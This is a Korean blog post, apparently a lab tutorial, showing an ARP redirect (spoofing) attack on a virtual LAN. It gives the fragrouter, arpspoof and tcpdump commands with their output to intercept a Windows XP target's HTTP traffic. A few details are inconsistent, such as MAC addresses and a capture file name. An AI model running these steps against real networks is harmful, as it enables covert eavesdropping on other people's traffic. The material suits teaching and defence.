ARP 리다이렉트는 ARP 스푸핑의 일종으로,공격자가 자신의 mac 주소가 게이트웨이(라우터)라는 ARP 응답을 지속적으로 브로드캐스트하는 (브로드캐스트 주소로 보내는) 공격 기법이다.
공격 대상이 전송하는 ARP 요청에 대해 정상 라우터 역시 ARP 응답을 보내겠지만,
공격자는 ARP 응답을 지속적으로 보내기 때문에 공격 대상의 mac 테이블에는 공격자의 mac 주소가 게이트웨이 mac 주소로 갱신된다.
결국 공격 대상이 게이트웨이로 전송하는 패킷은 공격자에게로 흘러가게 되고, 공격자는 전달받은 패킷을 도청할 수 있게 된다.
또한, 공격자는 전달받은 패킷을 정상 라우터에게 다시 전송(릴레이)하여 공격 대상이 정상적으로 통신 가능하도록 하기 때문에, 공격 대상은 별도의 조치를 취하지 않으면 자신의 패킷이 도청당하고 있다는 사실조차 알기 어렵다.
이 포스트에서는 Centos 6의 epel 리포지토리에서 제공하는 Fragrouter 프로그램을 이용하여 ARP 리다이렉트를 진행해본다.
Fragrouter는 패킷 릴레이를 지원하여 스니핑을 보조하는 프로그램이다.
모든 실습은 VMware NAT 환경에서 진행했으며, 실습 환경은 다음과 같다.
공격자
IP : 192.168.11.19
h/w address : 00:0C:29:E3:D3:C0
공격 대상
IP : 192.168.11.77
h/w address : 00:0C:29:8F:7E:5F
라우터
IP : 192.168.11.1
h/w address : 00:50:56:FB:DC:5E
1. 공격 대상의 arp 테이블을 확인한다.
# arp -a
+) 실행 결과 텍스트
Microsoft Windows XP [Version 5.1.2600]
<C> Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\st> arp -a
Interface: 192.168.11.77 --- 0x10003
Internet Address Physical Address Type
192.168.11.1 00-50-56-fb-dc-5e dynamic
C:\Documents and Settings\st> arp -a
기존 라우터의 mac 주소(00:50:56:FB:DC:5E)가 저장되어 있다.
2. fragrouter를 실행해 패킷 릴레이를 활성화한다.
# fragrouter -B1
+) 실행 결과 텍스트
[root@linux32bit ~]# fragrouter -B1
fragrouter: base-1: normal IP forwarding
...
3. arpspoof를 이용해 arp 리다이렉트를 실행한다.
# arpspoof -i eth0 -t 192.168.11.77 192.168.11.1
+) 실행 결과 텍스트
[root@linux32bit ~]# arpspoof -i eth0 -t 192.168.11.77 192.168.11.1
0:c:29:e3:d3:c0 0:c:29:8f:7e:5f 0806 42: arp reply 192.168.11.1 is-at 0:c:29:e3:de:c0
0:c:29:e3:d3:c0 0:c:29:8f:7e:5f 0806 42: arp reply 192.168.11.1 is-at 0:c:29:e3:de:c0
...
...
(주기적으로 위조된 arp reply를 보낸다)
4. 공격 대상의 arp 테이블을 확인한다.
게이트웨이 (192.168.11.1)의 mac 주소가 공격 대상의 mac 주소(00:0C:29:E3:D3:C0)로 저장되어 있는 것을 확인할 수 있다.
패킷 릴레이를 설정해놓았기 때문에 외부와의 통신도 정상적으로 가능하다.
단, 게이트웨이를 통하는 모든 패킷이 공격자를 거쳐 전달되므로 공격자는 모든 패킷을 도청할 수 있다.
공격자 PC에서 해당 패킷들을 도청(스니핑)할 수 있다.
# tcpdump -i eth0 tcp port 80 and host 192.168.11.77 and ether host 00:0C:29:E3:D3:C0 -w 11-77.pcap* 파일 확장자를 .pcap으로 설정해야 wireshark에서 패킷을 확인할 수 있다.
공격 대상(192.168.11.77)이 게이트웨이(192.168.11.1)로 보낸 패킷들이 게이트웨이가 아닌 공격자에게 전송된 것을 확인할 수 있다.
# cat 11-17.pcap | more
+) 실행 결과 텍스트
01:21:26.322402 IP 192.168.11.77.videte-cipc > 223.130.193.11.http: Flags [R.],
seq 1195912352, ack 565929998, win 0, length 0
0x0000: 4500 0028 4b08 4000 8006 4344 c0a8 0b4d E..(K.@...CD...M
0x0010: df82 c10b 0787 0050 4748 2ca0 21bb 680e .......PGH,.!.h.
0x0020: 5014 0000 3dc4 0000 0000 0000 0000 P...=.........
01:21:26.322466 IP 192.168.11.77.videte-cipc > 223.130.193.11.http: Flags [R.],
seq 0, ack 1, win 0, length 0
0x0000: 4500 0028 4b08 4000 8006 4344 c0a8 0b4d E..(K.@...CD...M
0x0010: df82 c10b 0787 0050 4748 2ca0 21bb 680e .......PGH,.!.h.
0x0020: 5014 0000 3dc4 0000 P...=...
01:21:26.324528 IP 192.168.11.77.b-novative-ls > a23-201-36-184.deploy.static.ak
amaitechnologies.com.http: Flags [R.], seq 1731564530, ack 338911022, win 0, len
gth 0
0x0000: 4500 0028 4b12 4000 8006 a747 c0a8 0b4d E..(K.@....G...M
0x0010: 17c9 24b8 0768 0050 6735 93f2 1433 5f2e ..$..h.Pg5...3_.
0x0020: 5014 0000 3119 0000 0000 0000 0000 P...1.........
01:21:26.324650 IP 192.168.11.77.b-novative-ls > a23-201-36-184.deploy.static.ak
amaitechnologies.com.http: Flags [R.], seq 0, ack 1, win 0, length 0
0x0000: 4500 0028 4b12 4000 8006 a747 c0a8 0b4d E..(K.@....G...M
0x0010: 17c9 24b8 0768 0050 6735 93f2 1433 5f2e ..$..h.Pg5...3_.
0x0020: 5014 0000 3119 0000 P...1...
01:21:31.587031 IP 192.168.11.77.tapestry > 192.229.190.65.http: Flags [R.], seq
169432263, ack 799428990, win 0, length 0
wireshark로 확인한 모습
destination mac 주소는 공격자의 mac 주소로(00:0C:29:E3:D3:C0) 설정되어 있고,
source mac 주소는 공격 대상의 mac 주소로(00:0C:29:8F:7E:5F) 설정되어 있어
공격 대상의 패킷이 도청당한 것을 확인할 수 있다.
'Network > 공격 기법' 카테고리의 다른 글
| ARP 스푸핑 대처법 (0) | 2023.05.12 |
|---|---|
| DNS 스푸핑 (0) | 2023.05.11 |
| ARP 스푸핑 (0) | 2023.05.11 |
| ICMP 리다이렉트 (0) | 2023.05.10 |
| ARP 리다이렉션 (배포판) (1) | 2023.05.10 |
